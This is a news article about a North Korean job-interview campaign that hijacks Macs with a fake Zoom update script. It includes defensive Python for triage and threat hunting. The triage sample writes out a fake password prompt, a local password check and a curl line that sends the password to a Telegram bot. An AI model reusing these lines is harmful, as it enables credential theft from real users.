
Microsoft reveals job interview scam being used to hack macOS users

Microsoft and Apple thwart stealthy macOS attack using fake Zoom updates to steal passwords and crypto data.

Cybersecurity is a shared responsibility: a single weak link in the chain can cripple an entire infrastructure. Software vendors and security researchers routinely collaborate to discover security gaps, report them privately to maintainers, and get them resolved before they are exploited. One such effort comes from Microsoft Threat Intelligence, which has worked with Apple to counter a macOS campaign that stole credentials and other sensitive data, including cryptocurrency wallets.

In details shared with Neowin, Microsoft described a sophisticated campaign by the North Korean state actor Sapphire Sleet targeting macOS users. Notably, the attack relies on social engineering rather than on exploiting software flaws: the victim is talked into running the malicious code themselves.

The threat actor set up fake recruiter profiles that engaged targets about job opportunities and then sent them invitations to technical interviews. Once a candidate joins the meeting, they are asked to install a file named Zoom SDK Update.scpt that is handed over during the call. This AppleScript file opens in the macOS Script Editor by default and looks harmless and official at first glance; the malicious code is buried thousands of lines down, where a casual scroll will never reach it. The unsuspecting target is then asked to run the script, which starts the attack chain.

On execution, the script downloads additional payloads using mechanisms the system already trusts, while tracking the campaign's progress with distinct user-agent strings on each request. The malware then performs reconnaissance, collecting details about the user account and the Mac. Next it launches a malicious "System Update" app that asks the user to enter their password, ostensibly to configure settings. The dialog is built from native macOS UI elements, so it is "visually indistinguishable" from a legitimate prompt, according to Microsoft. Once the entered password is validated against the local account database, it is immediately exfiltrated to Sapphire Sleet via the Telegram Bot API.

The toolchain then launches a "Software Update" application that stages a fake Zoom update which appears to complete successfully, defusing any doubt about the software's legitimacy. Finally, it installs multiple backdoors to maintain persistence on the target's machine.
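The chain above (a benign-looking script with its payload hidden far down, a native password prompt, a local check of the typed password, and exfiltration over the Telegram Bot API) is exactly the kind of thing a quick static triage can surface before anyone presses Run. The following Python script is an added illustration for this article, not code from Microsoft, Apple or Zoom. The article does not print the script, so the indicators it looks for are assumptions about how such a chain is usually written in AppleScript: `display dialog ... with hidden answer` for the prompt, `dscl . -authonly` for the password check, `do shell script "curl ..."` with a custom user-agent for staging, and an `api.telegram.org/bot<token>` URL for exfiltration. It expects the script as text; a compiled .scpt can be converted first with the macOS tool `osadecompile`. The sample script is constructed for the demo.

```python
"""
Static triage of a suspicious AppleScript delivered as text.

Added illustration, not Microsoft's, Apple's or Zoom's code. The indicator
patterns are assumptions about how a credential-phishing AppleScript is
typically built; tune them to the samples you actually see.
"""
import re
from dataclasses import dataclass

# Consecutive blank lines treated as deliberate padding (threshold chosen for
# the demo, not taken from the article).
PADDING_THRESHOLD = 200


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int      # 1-based line number, 0 for file-wide findings
    snippet: str


PATTERNS = {
    "native_password_prompt": re.compile(r"display dialog.*with hidden answer", re.I),
    "local_password_check": re.compile(r"\bdscl\s+\.\s+-?authonly\b", re.I),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+", re.I),
    "shell_download": re.compile(r"do shell script.*\b(curl|wget)\b", re.I),
    "custom_user_agent": re.compile(r"(?:\s-A|--user-agent)\s+['\"]", re.I),
}


def longest_blank_run(lines):
    """Longest run of whitespace-only lines: the tell-tale of code hidden below the fold."""
    best = cur = 0
    for ln in lines:
        cur = cur + 1 if ln.strip() == "" else 0
        best = max(best, cur)
    return best


def triage(text):
    """Return all findings for one script, in file order."""
    lines = text.splitlines()
    findings = []
    run = longest_blank_run(lines)
    if run >= PADDING_THRESHOLD:
        findings.append(Finding("whitespace_padding", 0, f"{run} consecutive blank lines"))
    for no, ln in enumerate(lines, start=1):
        for rule, rx in PATTERNS.items():
            if rx.search(ln):
                findings.append(Finding(rule, no, ln.strip()[:80]))
    return findings


def verdict(findings):
    """Hidden-answer prompt plus an exfil channel is credential theft; padding plus either is suspicious."""
    rules = {f.rule for f in findings}
    prompt = "native_password_prompt" in rules
    exfil = "telegram_bot_api" in rules
    padded = "whitespace_padding" in rules
    if prompt and exfil:
        return "credential-theft"
    if padded and (prompt or exfil):
        return "suspicious"
    return "clean"


# Constructed sample: a harmless-looking header, a wall of blank lines, then the payload.
SAMPLE_SCRIPT = "\n".join(
    ['-- Zoom SDK Update', 'display dialog "Updating Zoom SDK..." buttons {"OK"}']
    + [""] * 300
    + [
        'set pw to text returned of (display dialog "System Update needs your password to configure settings" default answer "" with hidden answer)',
        'do shell script "dscl . -authonly " & quoted form of (short user name of (system info)) & " " & quoted form of pw',
        'do shell script "curl -s -A \'zu-stage3\' https://api.telegram.org/bot123456:ABCdefGHIjklMNOpqrSTUvwxYZ/sendMessage -d text=" & quoted form of pw',
    ]
)

if __name__ == "__main__":
    found = triage(SAMPLE_SCRIPT)
    for f in found:
        print(f"{f.rule:24} line {f.line:4}  {f.snippet}")
    print("verdict:", verdict(found))
```

The padding check is the cheap one: a script whose longest blank run is in the hundreds has no honest reason to be laid out that way, and flagging it does not depend on recognising any particular payload. The pattern rules are the ones that will need maintenance as the tooling changes.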

Microsoft lists the following categories of information that Sapphire Sleet collects and exfiltrates from a compromised Mac:

  • Host and system reconnaissance
  • Installed applications and runtime verification
  • Messaging session data (Telegram)
  • Browser data and extension storage
  • macOS keychain
  • Cryptocurrency desktop wallets
  • SSH keys and shell history
  • Apple Notes
  • System logs and failed access attempts

Following discovery, Microsoft informed Apple of the campaign, and Apple strengthened its protections on macOS and in Safari in particular. Microsoft has also updated Defender to protect users against Sapphire Sleet's tooling, and has published guidance and Microsoft Defender XDR hunting queries that security teams can use to detect and mitigate the attack.
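Microsoft's own hunting queries are in its blog post; the Python below is an added illustration of the two hunts a defender would want from the chain described above, and is not one of Microsoft's queries. It works over endpoint telemetry with an invented minimal schema (process id, parent id, name, path; connection pid and URL), constructed here for the demo, so map it onto whatever your EDR exports. Hunt 1 flags any process that reaches api.telegram.org and whose ancestry includes Script Editor or osascript. Hunt 2 flags a process calling itself "System Update" or "Software Update" that does not run from under /System, which is where Apple's real updater lives.

```python
"""
Hunting the Sapphire Sleet-style chain over endpoint telemetry.

Added illustration, not Microsoft's published hunting queries. The event
schema below is invented for the demo; adapt the field names to your EDR.
"""
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    path: str


@dataclass(frozen=True)
class Conn:
    pid: int
    url: str


SCRIPT_HOSTS = {"Script Editor", "osascript"}          # where the .scpt gets run
IMPERSONATED_UPDATERS = {"System Update", "Software Update"}
EXFIL_HOSTS = {"api.telegram.org"}


def ancestry(procs, pid):
    """Process chain from pid up to the root, child first; stops on an unknown pid or a cycle."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def hunt(procs, conns):
    """Return (rule, pid, detail) tuples for both hunts."""
    alerts = []
    # Hunt 1: Telegram Bot API reached from a script-launched lineage.
    for c in conns:
        host = (urlparse(c.url).hostname or "").lower()
        if host not in EXFIL_HOSTS:
            continue
        chain = ancestry(procs, c.pid)
        if any(p.name in SCRIPT_HOSTS for p in chain):
            alerts.append(("script_to_telegram", c.pid, " <- ".join(p.name for p in chain)))
    # Hunt 2: an "updater" that is not Apple's, judged by where it runs from.
    for p in procs:
        if p.name in IMPERSONATED_UPDATERS and not p.path.startswith("/System/"):
            alerts.append(("impostor_updater", p.pid, p.path))
    return alerts


# Constructed telemetry: a Script Editor lineage ending in curl, the fake updater,
# plus Apple's real Software Update and an unrelated curl as negatives.
PROCS = [
    Proc(1, 0, "launchd", "/sbin/launchd"),
    Proc(100, 1, "Script Editor", "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    Proc(101, 100, "osascript", "/usr/bin/osascript"),
    Proc(102, 101, "sh", "/bin/sh"),
    Proc(103, 102, "curl", "/usr/bin/curl"),
    Proc(104, 101, "System Update", "/private/tmp/.zoomsdk/System Update.app/Contents/MacOS/System Update"),
    Proc(105, 1, "Software Update", "/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update"),
    Proc(200, 1, "curl", "/usr/bin/curl"),
]
CONNS = [
    Conn(103, "https://api.telegram.org/bot123456:ABCdef/sendMessage"),
    Conn(200, "https://zoom.us/client/latest/Zoom.pkg"),
]

if __name__ == "__main__":
    for rule, pid, detail in hunt(PROCS, CONNS):
        print(f"{rule:20} pid {pid:5}  {detail}")
```

Walking the full ancestry rather than just the parent matters here: by the time the exfiltration happens the script has already spawned a shell, and the shell has spawned curl, so a parent-only check would see nothing more interesting than `sh`.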

The exact scope of the campaign is unknown, but it appears to be narrowly aimed at high-value targets, given how it operates: it spreads through fake recruiter profiles, harvests cryptocurrency wallets, and only works if the target joins the interview from a Mac. More details on this espionage activity are available on the Microsoft Threat Intelligence blog.
